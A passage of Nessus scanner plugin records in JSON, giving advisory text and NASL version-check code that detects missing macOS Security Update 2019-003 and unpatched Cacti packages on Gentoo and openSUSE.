CVE-2019-8597, CVE-2019-8601, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, \n CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8628)\n\n - Processing maliciously crafted web content may result in the disclosure of process memory (CVE-2019-8607)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the operating system's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT210119\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to macOS version 10.14.5 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4456\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nfix = \"10.14.5\";\nminver = \"10.14\";\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Can't determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\nmatches = pregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (empty_or_null(matches)) exit(1, \"Failed to parse the macOS / Mac OS X version ('\" + os + \"').\");\n\nversion = matches[1];\n\nif (ver_compare(ver:version, minver:minver, fix:fix, strict:FALSE) == -1)\n{\n security_report_v4(\n port:0,\n severity:SECURITY_HOLE,\n extra:\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n'\n );\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"macOS / Mac OS X\", version);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T11:32:51", "bulletinFamily": "scanner", "description": "The remote host is running Mac OS X 10.12.6 or Mac OS X 10.13.6 and is missing a security update. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An application may be able to read restricted memory (CVE-2019-8603, CVE-2019-8560)\n\n - An application may be able to execute arbitrary code with system privileges (CVE-2019-8635, CVE-2019-8616,\n CVE-2019-8629, CVE-2018-4456, CVE-2019-8604, CVE-2019-8574, CVE-2019-8569)\n\n - An application may be able to execute arbitrary code with kernel privileges (CVE-2019-8590)\n\n - Processing a maliciously crafted audio file may lead to arbitrary code execution (CVE-2019-8592)\n\n - Processing a maliciously crafted movie file may lead to arbitrary code execution (CVE-2019-8585)\n\n - A malicious application may bypass Gatekeeper checks (CVE-2019-8589)\n\n - A malicious application may be able to read restricted memory (CVE-2019-8560, CVE-2019-8598)\n\n - A user may be unexpectedly logged in to another users account (CVE-2019-8634)\n\n - A local user may be able to load unsigned kernel extensions (CVE-2019-8606)\n\n - A malicious application may be able to execute arbitrary code with system privileges (CVE-2019-8605)\n\n - A local user may be able to cause unexpected system termination or read kernel memory (CVE-2019-8576)\n\n - An application may be able to cause unexpected system termination or write kernel memory (CVE-2019-8591)\n\n - An application may be able to gain elevated privileges (CVE-2019-8577)\n\n - A maliciously crafted SQL query may lead to arbitrary code execution (CVE-2019-8600)\n\n - A malicious application may be able to elevate privileges (CVE-2019-8602)\n\n - A local user may be able to modify protected parts of the file system (CVE-2019-8568)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution (CVE-2019-6237, CVE-2019-8571,\n CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596,\n CVE-2019-8597, CVE-2019-8601,CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615,\n CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8628)\n\n - Processing maliciously crafted web content may result in the disclosure of process memory (CVE-2019-8607)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the operating system", "modified": "2019-11-02T00:00:00", "id": "MACOSX_SECUPD2019-003.NASL", "href": "https://www.tenable.com/plugins/nessus/125151", "published": "2019-05-15T00:00:00", "title": "macOS and Mac OS X Multiple Vulnerabilities (Security Update 2019-003)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125151);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/01 9:03:02\");\n\n script_cve_id(\n \"CVE-2018-4456\",\n \"CVE-2019-6237\",\n \"CVE-2019-8560\",\n \"CVE-2019-8568\",\n \"CVE-2019-8569\",\n \"CVE-2019-8571\",\n \"CVE-2019-8574\",\n \"CVE-2019-8576\",\n \"CVE-2019-8577\",\n \"CVE-2019-8583\",\n \"CVE-2019-8584\",\n \"CVE-2019-8585\",\n \"CVE-2019-8586\",\n \"CVE-2019-8587\",\n \"CVE-2019-8589\",\n \"CVE-2019-8590\",\n \"CVE-2019-8591\",\n \"CVE-2019-8592\",\n \"CVE-2019-8594\",\n \"CVE-2019-8595\",\n \"CVE-2019-8596\",\n \"CVE-2019-8597\",\n \"CVE-2019-8598\",\n \"CVE-2019-8600\",\n \"CVE-2019-8601\",\n \"CVE-2019-8602\",\n \"CVE-2019-8603\",\n \"CVE-2019-8604\",\n \"CVE-2019-8605\",\n \"CVE-2019-8606\",\n \"CVE-2019-8607\",\n \"CVE-2019-8608\",\n \"CVE-2019-8609\",\n \"CVE-2019-8610\",\n \"CVE-2019-8611\",\n \"CVE-2019-8615\",\n \"CVE-2019-8616\",\n \"CVE-2019-8619\",\n \"CVE-2019-8622\",\n \"CVE-2019-8623\",\n \"CVE-2019-8628\",\n \"CVE-2019-8629\",\n \"CVE-2019-8634\",\n \"CVE-2019-8635\"\n );\n script_xref(name:\"APPLE-SA\", value:\"HT210119\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2019-05-09\");\n script_xref(name:\"IAVA\", value:\"2019-A-0401\");\n\n script_name(english:\"macOS and Mac OS X Multiple Vulnerabilities (Security Update 2019-003)\");\n script_summary(english:\"Checks the presence of Security Update 2019-003.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS or Mac OS X security update that fixes multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Mac OS X 10.12.6 or Mac OS X 10.13.6 and is missing a security update. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An application may be able to read restricted memory (CVE-2019-8603, CVE-2019-8560)\n\n - An application may be able to execute arbitrary code with system privileges (CVE-2019-8635, CVE-2019-8616,\n CVE-2019-8629, CVE-2018-4456, CVE-2019-8604, CVE-2019-8574, CVE-2019-8569)\n\n - An application may be able to execute arbitrary code with kernel privileges (CVE-2019-8590)\n\n - Processing a maliciously crafted audio file may lead to arbitrary code execution (CVE-2019-8592)\n\n - Processing a maliciously crafted movie file may lead to arbitrary code execution (CVE-2019-8585)\n\n - A malicious application may bypass Gatekeeper checks (CVE-2019-8589)\n\n - A malicious application may be able to read restricted memory (CVE-2019-8560, CVE-2019-8598)\n\n - A user may be unexpectedly logged in to another users account (CVE-2019-8634)\n\n - A local user may be able to load unsigned kernel extensions (CVE-2019-8606)\n\n - A malicious application may be able to execute arbitrary code with system privileges (CVE-2019-8605)\n\n - A local user may be able to cause unexpected system termination or read kernel memory (CVE-2019-8576)\n\n - An application may be able to cause unexpected system termination or write kernel memory (CVE-2019-8591)\n\n - An application may be able to gain elevated privileges (CVE-2019-8577)\n\n - A maliciously crafted SQL query may lead to arbitrary code execution (CVE-2019-8600)\n\n - A malicious application may be able to elevate privileges (CVE-2019-8602)\n\n - A local user may be able to modify protected parts of the file system (CVE-2019-8568)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution (CVE-2019-6237, CVE-2019-8571,\n CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596,\n CVE-2019-8597, CVE-2019-8601,CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615,\n CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8628)\n\n - Processing maliciously crafted web content may result in the disclosure of process memory (CVE-2019-8607)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the operating system's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT210119\");\n script_set_attribute(attribute:\"solution\", value:\"Install Security Update 2019-003 or later for 10.12.x or Security\nUpdate 2019-003 or later for 10.13.x\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4456\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_ports(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\n\n# Compare 2 patch numbers to determine if patch requirements are satisfied.\n# Return true if this patch or a later patch is applied\n# Return false otherwise\nfunction check_patch(year, number)\n{\n local_var p_split = split(patch, sep:\"-\");\n local_var p_year = int( p_split[0]);\n local_var p_num = int( p_split[1]);\n\n if (year > p_year) return TRUE;\n else if (year < p_year) return FALSE;\n else if (number >= p_num) return TRUE;\n else return FALSE;\n}\n\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\nos = get_kb_item_or_exit(\"Host/MacOSX/Version\");\n\nif (!preg(pattern:\"Mac OS X 10\\.1[2-3]\\.\", string:os))\n audit(AUDIT_OS_NOT, \"Mac OS X 10.12.x / 10.13.x\");\n\npatch = \"2019-003\";\n\npackages = get_kb_item_or_exit(\"Host/MacOSX/packages/boms\", exit_code:1);\nsec_boms_report = pgrep(\n pattern:\"^com\\.apple\\.pkg\\.update\\.(security\\.|os\\.SecUpd).*bom$\",\n string:packages\n);\nsec_boms = split(sec_boms_report, sep:'\\n');\n\nforeach package (sec_boms)\n{\n # Grab patch year and number\n matches = pregmatch(pattern:\"[^0-9](20[0-9][0-9])[-.]([0-9]{3})[^0-9]\", string:package);\n if (empty_or_null(matches)) continue;\n if (empty_or_null(matches[1]) || empty_or_null(matches[2]))\n continue;\n\n patch_found = check_patch(year:int(matches[1]), number:int(matches[2]));\n if (patch_found) exit(0, \"The host has Security Update \" + patch + \" or later installed and is therefore not affected.\");\n}\n\nreport = '\\n Missing security update : ' + patch;\nreport += '\\n Installed security BOMs : ';\nif (sec_boms_report) report += str_replace(find:'\\n', replace:'\\n ', string:sec_boms_report);\nelse report += 'n/a';\nreport += '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:40:42", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201607-05\n(Cacti: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Cacti. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, or remote authenticated users could bypass\n intended access restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.", "modified": "2019-11-02T00:00:00", "id": "GENTOO_GLSA-201607-05.NASL", "href": "https://www.tenable.com/plugins/nessus/92349", "published": "2016-07-18T00:00:00", "title": "GLSA-201607-05 : Cacti: Multiple vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201607-05.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(92349);\n script_version(\"2.4\");\n script_cvs_date(\"Date: 2019/04/11 17:23:06\");\n\n script_cve_id(\"CVE-2014-5261\", \"CVE-2014-5262\", \"CVE-2015-8369\", \"CVE-2015-8377\", \"CVE-2015-8604\", \"CVE-2016-2313\", \"CVE-2016-3172\", \"CVE-2016-3659\");\n script_xref(name:\"GLSA\", value:\"201607-05\");\n\n script_name(english:\"GLSA-201607-05 : Cacti: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201607-05\n(Cacti: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Cacti. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, or remote authenticated users could bypass\n intended access restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201607-05\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Cacti users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-analyzer/cacti-0.8.8h'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:cacti\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-analyzer/cacti\", unaffected:make_list(\"ge 0.8.8h\"), vulnerable:make_list(\"lt 0.8.8h\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Cacti\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T03:01:02", "bulletinFamily": "scanner", "description": "cacti was updated to fix the following vulnerabilities :\n\n - CVE-2015-8369: SQL injection in graph.php (boo#958863)\n\n - CVE-2015-8604: SQL injection in graphs_new.php\n (boo#960678)\n\n - CVE-2015-8377: SQL injection vulnerability in the\n host_new_graphs_save function in graphs_new.php\n (boo#958977)\n\n - CVE-2016-2313: Authentication using web authentication\n as a user not in the cacti database allows complete\n access (boo#965930)\n\nThe following non-security bugs were fixed :\n\n - boo#965864: Poller Script Parser was broken\n\ncacti-spine was updated to match the cacti version, fixing a number of\nupstream bugs.", "modified": "2019-11-02T00:00:00", "id": "OPENSUSE-2016-199.NASL", "href": "https://www.tenable.com/plugins/nessus/88733", "published": "2016-02-15T00:00:00", "title": "openSUSE Security Update : cacti (openSUSE-2016-199)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-199.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88733);\n script_version(\"$Revision: 2.2 $\");\n script_cvs_date(\"$Date: 2016/10/13 14:27:28 $\");\n\n script_cve_id(\"CVE-2015-8369\", \"CVE-2015-8377\", \"CVE-2015-8604\", \"CVE-2016-2313\");\n\n script_name(english:\"openSUSE Security Update : cacti (openSUSE-2016-199)\");\n script_summary(english:\"Check for the openSUSE-2016-199 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"cacti was updated to fix the following vulnerabilities :\n\n - CVE-2015-8369: SQL injection in graph.php (boo#958863)\n\n - CVE-2015-8604: SQL injection in graphs_new.php\n (boo#960678)\n\n - CVE-2015-8377: SQL injection vulnerability in the\n host_new_graphs_save function in graphs_new.php\n (boo#958977)\n\n - CVE-2016-2313: Authentication using web authentication\n as a user not in the cacti database allows complete\n access (boo#965930)\n\nThe following non-security bugs were fixed :\n\n - boo#965864: Poller Script Parser was broken\n\ncacti-spine was updated to match the cacti version, fixing a number of\nupstream bugs.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958863\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958977\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=960678\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=965864\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=965930\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected cacti packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cacti\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cacti-spine\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cacti-spine-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cacti-spine-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"cacti-0.8.8f-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"cacti-spine-0.8.8f-4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"cacti-spine-debuginfo-0.8.8f-4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"cacti-spine-debugsource-0.8.8f-4.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cacti-spine / cacti-spine-debuginfo / cacti-spine-debugsource / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T03:01:02", "bulletinFamily": "scanner", "description": "cacti was updated to fix the following vulnerabilities :\n\n - CVE-2015-8369: SQL injection in graph.php (boo#958863)\n\n - CVE-2015-8604: SQL injection in graphs_new.php\n (boo#960678)\n\n - CVE-2015-8377: SQL injection vulnerability in the\n host_new_graphs_save function in graphs_new.php\n (boo#958977)\n\n - CVE-2016-2313: Authentication using web authentication\n as a user not in the cacti database allows complete\n access (boo#965930)\n\ncacti-spine was updated to match the cacti version, fixing a number of\nupstream bugs.", "modified": "2019-11-02T00:00:00", "id": "OPENSUSE-2016-198.NASL", "href": "https://www.tenable.com/plugins/nessus/88732", "published": "2016-02-15T00:00:00", "title": "openSUSE Security Update : cacti (openSUSE-2016-198)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-198.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88732);\n script_version(\"$Revision: 2.2 $\");\n script_cvs_date(\"$Date: 2016/10/13 14:27:28 $\");\n\n script_cve_id(\"CVE-2015-8369\", \"CVE-2015-8377\", \"CVE-2015-8604\", \"CVE-2016-2313\");\n\n script_name(english:\"openSUSE Security Update : cacti (openSUSE-2016-198)\");\n script_summary(english:\"Check for the openSUSE-2016-198 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"cacti was updated to fix the following vulnerabilities :\n\n - CVE-2015-8369: SQL injection in graph.php (boo#958863)\n\n - CVE-2015-8604: SQL injection in graphs_new.php\n (boo#960678)\n\n - CVE-2015-8377: SQL injection vulnerability in the\n host_new_graphs_save function in graphs_new.php\n (boo#958977)\n\n - CVE-2016-2313: Authentication using web authentication\n as a user not in the cacti database allows complete\n access (boo#965930)\n\ncacti-spine was updated to match the cacti version, fixing a number of\nupstream bugs.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958863\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958977\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=960678\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=965930\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected cacti packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cacti\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cacti-spine\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cacti-spine-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cacti-spine-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"cacti-0.8.8f-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"cacti-spine-0.8.8f-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", 